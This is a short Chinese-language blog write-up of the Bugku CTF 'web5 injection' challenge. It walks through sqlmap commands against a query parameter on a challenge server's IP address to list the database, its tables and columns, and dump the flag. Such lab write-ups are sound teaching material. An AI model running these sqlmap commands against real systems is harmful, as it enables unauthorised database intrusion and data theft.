新版newbugku-web5-injection Writeup

2019年3月21日10:56:30 发表评论 浏览量:1,774次

打开网页,看到一个留言板

新版newbugku-web5-injection Writeup

不知道为什么,看到flag这个字眼就特别兴奋。。。。。于是点进去看看

新版newbugku-web5-injection Writeup

看到URL地址可能存在SQL注入:

http://47.95.208.167:10005/?mod=read&id=1

于是可爱的我打开sqlmap跑一下试试

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" --current-db

新版newbugku-web5-injection Writeup
卧槽,竟然跑出来了,这题好弱。。。。那我们就找flag吧,爆表。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 --tables –batch

新版newbugku-web5-injection Writeup
有一个名字叫flag的表,,,继续,爆字段。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag --columns –batch

新版newbugku-web5-injection Writeup
只有一个flag的字段,,,那就爆数据吧。。。。

sqlmap -u "http://47.95.208.167:10005/?mod\=read&id=1" -D web5 -T flag -C flag --dump  --batch

新版newbugku-web5-injection Writeup
得到flag。。。。。这题好弱。。

avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: